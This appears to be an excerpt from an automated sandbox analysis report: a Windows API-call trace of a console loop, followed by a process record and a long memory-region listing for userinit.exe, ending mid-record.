[0269.842] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0269.842] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6068
[0269.842] Sleep (dwMilliseconds=0x64)
[0269.968] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0269.968] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6068
[0269.968] Sleep (dwMilliseconds=0x64)
[0270.076] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0270.076] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6068
[0270.076] Sleep (dwMilliseconds=0x64)
[0270.201] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0270.201] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6068
[0270.201] Sleep (dwMilliseconds=0x64)
[0270.342] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0270.342] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6068
[0270.342] Sleep (dwMilliseconds=0x64)
[0270.482] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0270.482] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6069
[0270.482] _vsnwprintf (in: _Buffer=0x28fc14, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x28f988 | out: _Buffer="\x08\x08\x08\x083816") returned 8
[0270.482] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0270.482] __iob_func () returned 0x757a2900
[0270.482] _fileno (_File=0x757a2920) returned 1
[0270.482] _errno () returned 0x5507d8
[0270.482] _get_osfhandle (_FileHandle=1) returned 0x4c
[0270.482] _errno () returned 0x5507d8
[0270.482] GetFileType (hFile=0x4c) returned 0x2
[0270.482] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0270.482] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0270.483] lstrlenW (lpString="\x08\x08\x08\x083816") returned 8
[0270.622] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0270.623] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6069
[0270.623] Sleep (dwMilliseconds=0x64)
[0270.751] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0270.752] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6069
[0270.752] Sleep (dwMilliseconds=0x64)
[0270.887] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0270.888] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6069
[0270.888] Sleep (dwMilliseconds=0x64)
[0271.028] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0271.028] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6069
[0271.028] Sleep (dwMilliseconds=0x64)
[0271.239] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0271.239] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6069
[0271.240] Sleep (dwMilliseconds=0x64)
Process:
id = "28"
image_name = "userinit.exe"
filename = "c:\\windows\\system32\\userinit.exe"
page_root = "0x7f1be680"
os_pid = "0xf48"
os_integrity_level = "0x3000"
os_privileges = "0x60800000"
monitor_reason = "child_process"
parent_id = "24"
os_parent_pid = "0xf0c"
cmd_line = "\"C:\\Windows\\System32\\userinit.exe\""
cur_dir = "C:\\Windows\\system32\\"
os_username = "CRH2YWU7\\EEBsYm5"
os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ed0e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]
Region:
id = 2430
start_va = 0x10000
end_va = 0x2ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000010000"
filename = ""
Region:
id = 2431
start_va = 0x30000
end_va = 0x33fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000030000"
filename = ""
Region:
id = 2432
start_va = 0x40000
end_va = 0x40fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000040000"
filename = ""
Region:
id = 2433
start_va = 0xf0000
end_va = 0x12ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000000f0000"
filename = ""
Region:
id = 2434
start_va = 0x400000
end_va = 0x462fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000400000"
filename = ""
Region:
id = 2435
start_va = 0xef0000
end_va = 0xef8fff
entry_point = 0xef0000
region_type = mapped_file
name = "userinit.exe"
filename = "\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")
Region:
id = 2436
start_va = 0x76f20000
end_va = 0x7705bfff
entry_point = 0x76f20000
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 2437
start_va = 0x77160000
end_va = 0x77160fff
entry_point = 0x77160000
region_type = mapped_file
name = "apisetschema.dll"
filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll")
Region:
id = 2438
start_va = 0x7ffb0000
end_va = 0x7ffd2fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007ffb0000"
filename = ""
Region:
id = 2439
start_va = 0x7ffde000
end_va = 0x7ffdefff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffde000"
filename = ""
Region:
id = 2440
start_va = 0x7ffdf000
end_va = 0x7ffdffff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffdf000"
filename = ""
Region:
id = 2475
start_va = 0x1e0000
end_va = 0x2dffff
entry_point = 0x0
region_type = private
name = "private_0x00000000001e0000"
filename = ""
Region:
id = 2476
start_va = 0x75320000
end_va = 0x75369fff
entry_point = 0x75320000
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 2477
start_va = 0x75370000
end_va = 0x75443fff
entry_point = 0x75370000
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 2478
start_va = 0x10000
end_va = 0x1ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 2479
start_va = 0x50000
end_va = 0xb6fff
entry_point = 0x50000
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 2480
start_va = 0x160000
end_va = 0x16ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000160000"
filename = ""
Region:
id = 2481
start_va = 0x6ced0000
end_va = 0x6cf53fff
entry_point = 0x6ced0000
region_type = mapped_file
name = "comctl32.dll"
filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll")
Region:
id = 2482
start_va = 0x745c0000
end_va = 0x745c8fff
entry_point = 0x745c0000
region_type = mapped_file
name = "version.dll"
filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll")
Region:
id = 2483
start_va = 0x754b0000
end_va = 0x754b9fff
entry_point = 0x754b0000
region_type = mapped_file
name = "lpk.dll"
filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll")
Region:
id = 2484
start_va = 0x75700000
end_va = 0x757abfff
entry_point = 0x75700000
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Region:
id = 2485
start_va = 0x757b0000
end_va = 0x75878fff
entry_point = 0x757b0000
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 2486
start_va = 0x75880000
end_va = 0x758cdfff
entry_point = 0x75880000
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")
Region:
id = 2487
start_va = 0x758d0000
end_va = 0x758e8fff
entry_point = 0x758d0000
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")
Region:
id = 2488
start_va = 0x758f0000
end_va = 0x7597efff
entry_point = 0x758f0000
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")
Region:
id = 2489
start_va = 0x75bc0000
end_va = 0x75c5cfff
entry_point = 0x75bc0000
region_type = mapped_file
name = "usp10.dll"
filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")
Region:
id = 2490
start_va = 0x76a20000
end_va = 0x76b7bfff
entry_point = 0x76a20000
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")
Region:
id = 2491
start_va = 0x76da0000
end_va = 0x76e3ffff
entry_point = 0x76da0000
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")
Region:
id = 2492
start_va = 0x76e60000
end_va = 0x76f00fff
entry_point = 0x76e60000
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")
Region:
id = 2493
start_va = 0x7f6f0000
end_va = 0x7f7effff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007f6f0000"
filename = ""
Region:
id = 2494
start_va = 0x2e0000
end_va = 0x3a7fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000002e0000"
filename = ""
Region:
id = 2495
start_va = 0x759b0000
end_va = 0x75a7bfff
entry_point = 0x759b0000
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")
Region:
id = 2496
start_va = 0x76e40000
end_va = 0x76e5efff
entry_point = 0x76e40000
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 2497
start_va = 0x20000
end_va = 0x20fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000020000"
filename = ""
Region:
id = 2498
start_va = 0xc0000
end_va = 0xc0fff
entry_point = 0x0
region_type = private
name = "private_0x00000000000c0000"
filename = ""
Region:
id = 2499
start_va = 0x470000
end_va = 0x570fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000470000"
filename = ""
Region:
id = 2500
start_va = 0x770000
end_va = 0x77ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000770000"
filename = ""
Region:
id = 2501
start_va = 0xf00000
end_va = 0x1afffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000f00000"
filename = ""
Region:
id = 2502
start_va = 0x580000
end_va = 0x67ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000580000"
filename = ""
Region:
id = 2503
start_va = 0x736a0000
end_va = 0x736dffff
entry_point = 0x736a0000
region_type = mapped_file
name = "uxtheme.dll"
filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll")
Region:
id = 2504
start_va = 0x780000
end_va = 0x89ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000780000"
filename = ""
Region:
id = 2513
start_va = 0x680000
end_va = 0x75efff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000680000"
filename = ""
Region:
id = 2514
start_va = 0xd0000
end_va = 0xd0fff
entry_point = 0x0
region_type = private
name = "private_0x00000000000d0000"
filename = ""
Region:
id = 2515
start_va = 0x733b0000
end_va = 0x733c2fff
entry_point = 0x733b0000
region_type = mapped_file
name = "dwmapi.dll"
filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll")
Region:
id = 2516
start_va = 0x780000
end_va = 0x82ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000780000"
filename = ""
Region:
id = 2517
start_va = 0x860000
end_va = 0x89ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000860000"
filename = ""
Region:
id = 2518
start_va = 0x1b00000
end_va = 0x242ffff
entry_point = 0x1b00000
region_type = mapped_file
name = "staticcache.dat"
filename = "\\Windows\\Fonts\\StaticCache.dat" (normalized: "c:\\windows\\fonts\\staticcache.dat")
Region:
id = 2519
start_va = 0xe0000
end_va = 0xe6fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000000e0000"
filename = ""
Region:
id = 2520
start_va = 0x130000
end_va = 0x131fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000130000"
filename = ""
Region:
id = 2521
start_va = 0x8a0000
end_va = 0xc92fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000008a0000"
filename = ""
Region:
id = 2522
start_va = 0xca0000
end_va = 0xd1ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000ca0000"
filename = ""
Region:
id = 2523
start_va = 0xd20000
end_va = 0xe2cfff
entry_point = 0x0
region_type = private
name = "private_0x0000000000d20000"
filename = ""
Region:
id = 2536
start_va = 0x2430000
end_va = 0x252ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002430000"
filename = ""
Region:
id = 2538
start_va = 0x2530000
end_va = 0x272ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002530000"
filename = ""
Region:
id = 2539
start_va = 0xe30000
end_va = 0xeb0fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000e30000"
filename = ""
Region:
id = 2541
start_va = 0x2730000
end_va = 0x27b2fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002730000"
filename = ""
Region:
id = 2542
start_va = 0xe30000
end_va = 0xeb4fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000e30000"
filename = ""
Region:
id = 2543
start_va = 0x2730000
end_va = 0x27b6fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002730000"
filename = ""
Region:
id = 2547
start_va = 0xe30000
end_va = 0xeb8fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000e30000"
filename = ""
Region:
id = 2548
start_va = 0x2730000
end_va = 0x27bafff
entry_point = 0x0
region_type = private
name = "private_0x0000000002730000"
filename = ""
Region:
id = 2549
start_va = 0xe30000
end_va = 0xebcfff
entry_point = 0x0
region_type = private
name = "private_0x0000000000e30000"
filename = ""
Region:
id = 2553
start_va = 0x2730000
end_va = 0x27befff
entry_point = 0x0
region_type = private
name = "private_0x0000000002730000"
filename = ""
Region:
id = 2554
start_va = 0xe30000
end_va = 0xec0fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000e30000"
filename = ""
Region:
id = 2555
start_va = 0x2730000
end_va = 0x27c2fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002730000"
filename = ""
Region:
id = 2559
start_va = 0xe30000
end_va = 0xec4fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000e30000"
filename = ""
Region:
id = 2560
start_va = 0x2730000
end_va = 0x27c6fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002730000"
filename = ""
Region:
id = 2561
start_va = 0xe30000
end_va = 0xec8fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000e30000"
filename = ""
Region:
id = 2565
start_va = 0x2730000
end_va = 0x27cafff
entry_point = 0x0
region_type = private
name = "private_0x0000000002730000"
filename = ""
Region:
id = 2566
start_va = 0xe30000
end_va = 0xeccfff
entry_point = 0x0
region_type = private
name = "private_0x0000000000e30000"
filename = ""
Region:
id = 2570
start_va = 0x2730000
end_va = 0x27cefff
entry_point = 0x0
region_type = private
name = "private_0x0000000002730000"
filename = ""
Region:
id = 2571
start_va = 0xe30000
end_va = 0xed0fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000e30000"
filename = ""
Region:
id = 2575
start_va = 0x2730000
end_va = 0x27d2fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002730000"
filename = ""
Region:
id = 2576
start_va = 0xe30000
end_va = 0xed4fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000e30000"
filename = ""
Region:
id = 2577
start_va = 0x2730000
end_va = 0x27d6fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002730000"
filename = ""
Region:
id = 2580
start_va = 0xe30000
end_va = 0xed8fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000e30000"
filename = ""
Region:
id = 2581
start_va = 0x2730000
end_va = 0x27dafff
entry_point = 0x0
region_type = private
name = "private_0x0000000002730000"
filename = ""
Region:
id = 2584
start_va = 0xe30000
end_va = 0xedcfff
entry_point = 0x0
region_type = private
name = "private_0x0000000000e30000"
filename = ""
Region:
id = 2585
start_va = 0x2730000
end_va = 0x27defff
entry_point = 0x0
region_type = private
name = "private_0x0000000002730000"
filename = ""
Region:
id = 2586
start_va = 0xe30000
end_va = 0xee0fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000e30000"
filename = ""
Region:
id = 2590
start_va = 0x2730000
end_va = 0x27e2fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002730000"
filename = ""
Region:
id = 2591
start_va = 0xe30000
end_va = 0xee4fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000e30000"
filename = ""
Region:
id = 2594
start_va = 0x2730000
end_va = 0x27e6fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002730000"
filename = ""
Region:
id = 2595
start_va = 0xe30000
end_va = 0xee8fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000e30000"
filename = ""
Region:
id = 2598
start_va = 0x2730000
end_va = 0x27eafff
entry_point = 0x0
region_type = private
name = "private_0x0000000002730000"
filename = ""
Region:
id = 2599
start_va = 0xe30000
end_va = 0xeecfff
entry_point = 0x0
region_type = private
name = "private_0x0000000000e30000"
filename = ""
Region:
id = 2600
start_va = 0x2730000
end_va = 0x27eefff
entry_point = 0x0
region_type = private
name = "private_0x0000000002730000"
filename = ""
Region:
id = 2604
start_va = 0x27f0000
end_va = 0x28b0fff
entry_point = 0x0
region_type = private
name = "private_0x00000000027f0000"
filename = ""
Region:
id = 2605
start_va = 0x28c0000
end_va = 0x2982fff
entry_point = 0x0
region_type = private
name = "private_0x00000000028c0000"
filename = ""
Region:
id = 2608
start_va = 0x2730000
end_va = 0x27f4fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002730000"
filename = ""
Region:
id = 2609
start_va = 0x2800000
end_va = 0x28c6fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002800000"
filename = ""
Region:
id = 2610
start_va = 0x2730000
end_va = 0x27f8fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002730000"
filename = ""
Region:
id = 2613
start_va = 0x2800000
end_va = 0x28cafff
entry_point = 0x0
region_type = private
name = "private_0x0000000002800000"
filename = ""
Region:
id = 2614
start_va = 0x2730000
end_va = 0x27fcfff
entry_point = 0x0
region_type = private
name = "private_0x0000000002730000"
filename = ""
Region:
id = 2617
start_va = 0x2800000
end_va = 0x28cefff
entry_point = 0x0
region_type = private
name = "private_0x0000000002800000"
filename = ""
Region:
id = 2618
start_va = 0x28d0000
end_va = 0x29a0fff
entry_point = 0x0
region_type = private
name = "private_0x00000000028d0000"
filename = ""
Region:
id = 2621
start_va = 0x2730000
end_va = 0x2802fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002730000"
filename = ""
Region:
id = 2622
start_va = 0x2810000
end_va = 0x28e4fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002810000"
filename = ""
Region:
id = 2625
start_va = 0x2730000
end_va = 0x2806fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002730000"
filename = ""
Region:
id = 2626
start_va = 0x2810000
end_va = 0x28e8fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002810000"
filename = ""
Region:
id = 2629
start_va = 0x2730000
end_va = 0x280afff
entry_point = 0x0
region_type = private
name = "private_0x0000000002730000"
filename = ""
Region:
id = 2630
start_va = 0x2810000
end_va = 0x28ecfff
entry_point = 0x0
region_type = private
name = "private_0x0000000002810000"
filename = ""
Region:
id = 2633
start_va = 0x2730000
end_va = 0x280efff
entry_point = 0x0
region_type = private
name = "private_0x0000000002730000"
filename = ""
Region:
id = 2634
start_va = 0x2810000
end_va = 0x28f0fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002810000"
filename = ""
Region:
id = 2637
start_va = 0x2900000
end_va = 0x29e2fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002900000"
filename = ""
Region:
id = 2638
start_va = 0x2730000
end_va = 0x2814fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002730000"
filename = ""
Region:
id = 2641
start_va = 0x2820000
end_va = 0x2906fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002820000"
filename = ""
Region:
id = 2642
start_va = 0x2730000
end_va = 0x2818fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002730000"
filename = ""
Region:
id = 2645
start_va = 0x2820000
end_va = 0x290afff
entry_point = 0x0
region_type = private
name = "private_0x0000000002820000"
filename = ""
Region:
id = 2646
start_va = 0x2730000
end_va = 0x281cfff
entry_point = 0x0
region_type = private
name = "private_0x0000000002730000"
filename = ""
Region:
id = 2649
start_va = 0x2820000
end_va = 0x290efff
entry_point = 0x0
region_type = private
name = "private_0x0000000002820000"
filename = ""
Region:
id = 2650
start_va = 0x2910000
end_va = 0x2a00fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002910000"
filename = ""
Region:
id = 2653
start_va = 0x2730000
end_va = 0x2822fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002730000"
filename = ""
Region:
id = 2654
start_va = 0x2830000
end_va = 0x2924fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002830000"
filename = ""
Region:
id = 2657
start_va = 0x2730000
end_va = 0x2826fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002730000"
filename = ""
Region:
id = 2658
start_va = 0x2830000
end_va = 0x2928fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002830000"
filename = ""
Region:
id = 2660
start_va = 0x2730000
end_va = 0x282afff
entry_point = 0x0
region_type = private
name = "private_0x0000000002730000"
filename = ""
Region:
id = 2663
start_va = 0x2830000
end_va = 0x292cfff
entry_point = 0x0
region_type = private
name = "private_0x0000000002830000"
filename = ""
Region:
id = 2664
start_va = 0x2730000
end_va = 0x282efff
entry_point = 0x0
region_type = private
name = "private_0x0000000002730000"
filename = ""
Region:
id = 2667
start_va = 0x2830000
end_va = 0x2930fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002830000"
filename = ""
Region:
id = 2668
start_va = 0x2940000
end_va = 0x2a42fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002940000"
filename = ""
Region:
id = 2671
start_va = 0x2730000
end_va = 0x2834fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002730000"
filename = ""
Region:
id = 2672
start_va = 0x2840000
end_va = 0x2946fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002840000"
filename = ""
Region:
id = 2674
start_va = 0x2730000
end_va = 0x2838fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002730000"
filename = ""
Region:
id = 2677
start_va = 0x2840000
end_va = 0x294afff
entry_point = 0x0
region_type = private
name = "private_0x0000000002840000"
filename = ""
Region:
id = 2678
start_va = 0x2730000
end_va = 0x283cfff
entry_point = 0x0
region_type = private
name = "private_0x0000000002730000"
filename = ""
Region:
id = 2681
start_va = 0x2840000
end_va = 0x294ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002840000"
filename = ""
Region:
id = 2683
start_va = 0x2950000
end_va = 0x2a62fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002950000"
filename = ""
Region:
id = 2684
start_va = 0x750e0000
end_va = 0x750ebfff
entry_point = 0x750e0000
region_type = mapped_file
name = "msasn1.dll"
filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll")
Region:
id = 2685
start_va = 0x751b0000
end_va = 0x752ccfff
entry_point = 0x751b0000
region_type = mapped_file
name = "crypt32.dll"
filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll")
Region:
id = 2686
start_va = 0x754c0000
end_va = 0x756bafff
entry_point = 0x754c0000
region_type = mapped_file
name = "iertutil.dll"
filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll")
Region:
id = 2687
start_va = 0x75a80000
end_va = 0x75bb5fff
entry_point = 0x75a80000
region_type = mapped_file
name = "urlmon.dll"
filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll")
Region:
id = 2688
start_va = 0x768c0000
end_va = 0x76916fff
entry_point = 0x768c0000
region_type = mapped_file
name = "shlwapi.dll"
filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")
Region:
id = 2689
start_va = 0x76920000
end_va = 0x76a14fff
entry_point = 0x76920000
region_type = mapped_file
name = "wininet.dll"
filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll")
Region:
id = 2690
start_va = 0x71bf0000
end_va = 0x71c2bfff
entry_point = 0x71bf0000
region_type = mapped_file
name = "oleacc.dll"
filename = "\\Windows\\System32\\oleacc.dll" (normalized: "c:\\windows\\system32\\oleacc.dll")
Region:
id = 2691
start_va = 0x140000
end_va = 0x140fff
entry_point = 0x140000
region_type = mapped_file
name = "oleaccrc.dll"
filename = "\\Windows\\System32\\oleaccrc.dll" (normalized: "c:\\windows\\system32\\oleaccrc.dll")
Region:
id = 2692
start_va = 0x2a70000
end_va = 0x2b6ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002a70000"
filename = ""
Region:
id = 2693
start_va = 0x150000
end_va = 0x150fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000150000"
filename = ""
Region:
id = 2707
start_va = 0x6ceb0000
end_va = 0x6cec8fff
entry_point = 0x6ceb0000
region_type = mapped_file
name = "olepro32.dll"
filename = "\\Windows\\System32\\olepro32.dll" (normalized: "c:\\windows\\system32\\olepro32.dll")
Region:
id = 2712
start_va = 0x73b10000
end_va = 0x73b20fff
entry_point = 0x73b10000
region_type = mapped_file
name = "netapi32.dll"
filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll")
Region:
id = 2713
start_va = 0x73b00000
end_va = 0x73b08fff
entry_point = 0x73b00000
region_type = mapped_file
name = "netutils.dll"
filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll")
Region:
id = 2714
start_va = 0x74f10000
end_va = 0x74f28fff
entry_point = 0x74f10000
region_type = mapped_file
name = "srvcli.dll"
filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll")
Region:
id = 2715
start_va = 0x73af0000
end_va = 0x73afefff
entry_point = 0x73af0000
region_type = mapped_file
name = "wkscli.dll"
filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll")
Region:
id = 2720
start_va = 0x170000
end_va = 0x1affff
entry_point = 0x0
region_type = private
name = "private_0x0000000000170000"
filename = ""
Region:
id = 2721
start_va = 0x2bb0000
